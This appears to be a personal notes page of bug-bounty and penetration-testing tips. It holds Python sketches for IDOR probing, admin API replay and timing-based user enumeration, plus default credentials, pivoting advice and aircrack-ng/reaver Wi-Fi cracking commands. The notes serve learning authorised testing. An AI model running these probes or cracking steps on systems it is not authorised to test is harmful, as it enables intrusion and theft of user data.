Deobfuscate with de4dot, decompile using dnSpy, capture SOAP messages using a proxy and Burp, read memory strings using Process Hacker.


Tooling tip: check out JetBrains' dotPeek; it's the best .NET decompiler I've found.

For vulnerabilities, I usually focus hard on anything cryptography or authentication related. People always f*ck those up. How are passwords secured? How is authentication handled? Is there any mechanism for preventing users from doing things they're not authorized to do within the application? If so, how is that enforced?

If the application is connected to a database, make sure things are properly sanitised. Is there a back-end? If so, is communication with the back-end handled securely?

Almost all of what you learned from doing web stuff applies here, just differently.


dotPeek and WinDbg are worth a look.

Also MS has this list of tools that may help:


Very often the most interesting attack vectors in such setups derive from client-side workflow enforcement. I've seen systems in which administrative rights were checked on the client side or where parameter enforcement was done on the client. Isolate the API calls and see what you can do with them.
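"Isolate the API calls" from a thick client can be as simple as rebuilding the raw request yourself, minus whatever gating the client UI does. A sketch under invented names — the endpoint, token, and body here are hypothetical, captured via a proxy from the real client:

```python
# Sketch: replay an API call the thick client normally hides behind a
# client-side admin check. Endpoint and parameter names are invented.
import json
from urllib.request import Request, urlopen

def build_request(base, token, body):
    """The raw API call the client would send, minus its UI gating."""
    return Request(
        base + "/api/v1/users/delete",     # hypothetical admin-only endpoint
        data=json.dumps(body).encode(),
        headers={"Authorization": "Bearer " + token,
                 "Content-Type": "application/json"},
    )

# The client UI hides this action from low-privilege users, but does the
# server enforce the privilege, or only the client ? (Uncomment to send.)
req = build_request("https://target.example", "low-priv-token",
                    {"user_id": 1042})
# print(urlopen(req).status)
```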

Attack Tips and Tactics



Quick try at a site

[From Jason Haddix's "How To Shot Web" (PDF)]

  1. Visit the search, registration, contact, password reset, and comment forms and hit them with your polyglot (XSS) strings.

  2. Scan those specific functions with Burp's built-in scanner.

  3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.

  4. Perform user enumeration checks on login, registration, and password reset.

  5. Do a reset and see if: the password comes back in plaintext, the reset uses a URL-based token, the token is predictable, the token can be used multiple times, or the reset logs you in automatically.

  6. Find numeric account identifiers anywhere in URLs and rotate them for context change.

  7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.

  8. Directory brute-force with the top short wordlist from SecLists.

  9. Check upload functions for alternate file types that can execute code (XSS or PHP etc).
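Step 6 (rotating numeric account identifiers) can be scripted. A sketch, assuming a hypothetical URL template and session cookie — a 200 containing someone else's data is a likely IDOR, while consistent 403/404s suggest the server enforces ownership:

```python
# Sketch: rotate numeric IDs around your own account's ID and compare
# responses. URL template and cookie are hypothetical.
from urllib.request import Request, urlopen
from urllib.error import HTTPError

def candidate_urls(template, my_id, spread=5):
    """Yield (id, url) for neighbouring IDs around your own numeric ID."""
    for offset in range(-spread, spread + 1):
        other = my_id + offset
        if other != my_id and other > 0:
            yield other, template.format(id=other)

def probe(urls, cookie):
    for other, url in urls:
        try:
            resp = urlopen(Request(url, headers={"Cookie": cookie}))
            # 200 with another user's data: likely IDOR; save the evidence.
            print(other, resp.status, len(resp.read()))
        except HTTPError as e:
            print(other, e.code)   # 403/404 suggests enforcement

# Live use against an in-scope target (uncomment):
# probe(candidate_urls("https://target.example/account/{id}/invoices", 1042),
#       cookie="session=...")
```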

From /u/cym13 on reddit 5/2019:
  • Build a list of websites with bug bounty programs. Make sure that they have similar terms and conditions. Always abide by those terms and conditions. The reason why I recommend restricting yourself to similar terms is to limit confusion.

  • Explore those sites. You need to know them well, what technologies they use, how they're structured, their subdomains, etc. Enumeration is paramount.

  • Subscribe to /r/netsec, /r/security, /r/bugbounty, anything that gives you security articles daily. Read them. If you don't understand, search, ask, or store them for later, but it's important to understand as much as possible. This will build your arsenal.

  • Now oftentimes you'll see an article that lights a bulb, for example a remote code execution for websites using Ruby on Rails. At that point you should think "Oh, I know these two sites in my list that use RoR, I should try this technique there!".

  • Repeat. Expand your list of targets regularly, but not so often that you don't remember them well. This technique is not perfect, but it'll help grow your understanding of what's possible, will get you to actually try things without feeling too down when you don't find anything (and most of the time you won't), and it might even give you an edge over other hunters, since you may very well be the first to try that technique on that website.

  • Always remember: the worst possible thing isn't that you don't find anything, it's that you don't give yourself a chance to try. Learn on labs if you want, in books if you want, but this should never be a substitute for going out there to try stupid stuff.

For beginners, from InsiderPhD's "Finding Your First Bug" series (video):
IDOR or API bugs are good places for a beginner to start. They don't require deep technical knowledge, and persistence can pay off, but being methodical and systematic and keeping notes are important. Make sure your report specifies the business impact: instead of "changed parameter X in the URL and the server accepted it", something like "was able to buy expensive product Y for $1".

From /u/Metasploit-Ninja on reddit 1/2019:
Re: misconfigurations:

For pentesting, the vast majority of findings you come across are misconfigurations. Could be screw-ups in group policy or bad password policies, etc., but I see a lot of things like default creds for web instances like Apache Tomcat (tomcat:tomcat or admin:admin), etc.

I also see a lot of misconfigurations in VMware Enterprise setups where a customer will have a PCI-DSS/CDE network that is supposed to be segmented from the regular enterprise/production network but isn't fully. For example, there might be a vSphere/vCenter instance that connects to all the VMware hosts, and the customer might have a host for just PCI and others for their regular production network, but vCenter/vSphere can connect to all of them. So if you compromised credentials like a VMware admin's in the regular production network, you can just use vCenter/vSphere to jump into a PCI/CDE host, then compromise the VMs, or even take a snapshot of the VMs you want and download them from the datastore. I see this in a LOT of different places and people don't even think about it. They just see how info flows physically and logically, but not how it flows virtually.

Also, I'll see two-factor setups with things like 2FA Duo where they have it set to "open" if the user getting the 2FA request doesn't press anything. This is because Duo communicates via the cloud, and if something happens to the connection, you can't log in to critical systems, so by default it fails open. If you have a fairly stable connection, you wouldn't want it that way. If an attacker gets creds and tries to log in at, let's say, 3am while you are sleeping, the request would time out and they would get in without you pressing anything. Oops.

I also see a lot of OWA instances where you can enumerate users because of timing attack vulnerabilities associated with their instance. For example, if you gather a list of users from LinkedIn, social media sites, Google, etc, you can create a list and throw it against the OWA server and if the user is actually present, it will usually respond back with a valid/invalid error after 0.2 seconds. If the user doesn't exist in Active Directory, it will respond back after ~13-15 seconds. See Metasploit module auxiliary/scanner/http/owa_login for info on that and options.
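The timing attack above reduces to "valid users fail fast, invalid users fail slow". A minimal sketch of the measurement logic; the login function here is a stub, and against a real OWA-style endpoint you would instead POST each candidate username with a junk password and time the HTTP response (thresholds like 0.2s vs ~13-15s come from the description above):

```python
# Sketch: timing-based username enumeration. attempt_login is a stub here;
# replace it with a real timed HTTP request against the login form.
import time

def timed(fn, *args):
    start = time.monotonic()
    fn(*args)
    return time.monotonic() - start

def enumerate_users(candidates, attempt_login, threshold):
    """Users whose (failing) login attempt returns quickly likely exist."""
    return [u for u in candidates if timed(attempt_login, u) < threshold]

# Demo stub: "valid" users respond fast, unknown users hang. Demo only.
def fake_attempt(user):
    time.sleep(0.0 if user in ("alice", "bob") else 0.3)

print(enumerate_users(["alice", "bob", "zzz"], fake_attempt, threshold=0.15))
```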

I could go on but those are common ones I see all the time.

Craig Hays' "Bug Bounty Hunting Tips #1 - Always read the source code"
Somdev Sangwan's "Finding vulnerabilities in Source Code"

Craig Hays' "Develop a Process and Follow It"
Sean's "One company: 262 bugs, 100% acceptance, 2.57 priority, millions of user details saved"
EdOverflow / bugbounty-cheatsheet /
Bugcrowd forum discussion "How do you approach a target?"
Jean Fleury's "So You Want To Become a Bug Bounty Hunter?"
Aakash Choudhary's "Bug-Hunting-Tips/Tricks"
Sanyam Chawla's "Bug Bounty Methodology (TTP- Tactics, Techniques, and Procedures) V 2.0"
sehno's "Bug Bounty Checklist for Web App"
gowsundar's "Book of BugBounty Tips"
Stök and Jason Haddix: "If you're not doing this you're missing out" (video)

When you think you've found a bug

Gather samples of as many types of sensitive data as you can (not as much data as you can). Can you list all users ? Get passwords for user accounts or for accounts on other systems or services ? Get log files ? Get configuration files that show other network devices ? Get PII for users ? Get version numbers of OS and software ? Get encrypted files to try to crack later ?

Can you use this to do another exploit, a better one ?

Kunal Pandey's "Avoid rookie mistakes and progress positively in bug bounty"

Does the same bug exist in other apps that use the same module ?
Offensive Security by Automation's "Open Redirection: A Case Study"

Interesting thoughts: LiveOverflow's "What is a Security Vulnerability?" (video)

Star Trek Picard: have you tried reversing the polarity of something ?


Cracking Wi-Fi password (don't get excited, probably your network interface is not supported)

Following SecurityEquifax's "How to Hack a Wi-Fi Password - 2020 Guide"
Don't use WiFi Cracko; I've read that it's mostly marketing hype.

sudo apt install aircrack-ng reaver

ip -c addr			#  get interface name such as wlp18s0
sudo airmon-ng		#  list wireless interfaces and their chipsets/drivers

sudo airmon-ng check
sudo airmon-ng check kill
sudo airmon-ng check
sudo airodump-ng wlp18s0	# get BSSID of target network, such as 00:90:4C:C1:AC:21
# Failed; didn't work for me, probably my interface chip not supported.
# Ctrl+C to stop
sudo reaver -i wlp18s0 -b THEBSSID -vv -K
# The target network must have activity on it during this time.

sudo airmon-ng start wlp18s0
sudo airodump-ng wlp18s0
# Failed; didn't work for me, probably my interface chip not supported.

# Another way to get SSIDs (and see all signals):
sudo apt install linssid
sudo linssid

sudo apt remove aircrack-ng reaver
sudo rfkill
sudo rfkill unblock all
# May have to reboot a couple of times for networking to get back to normal.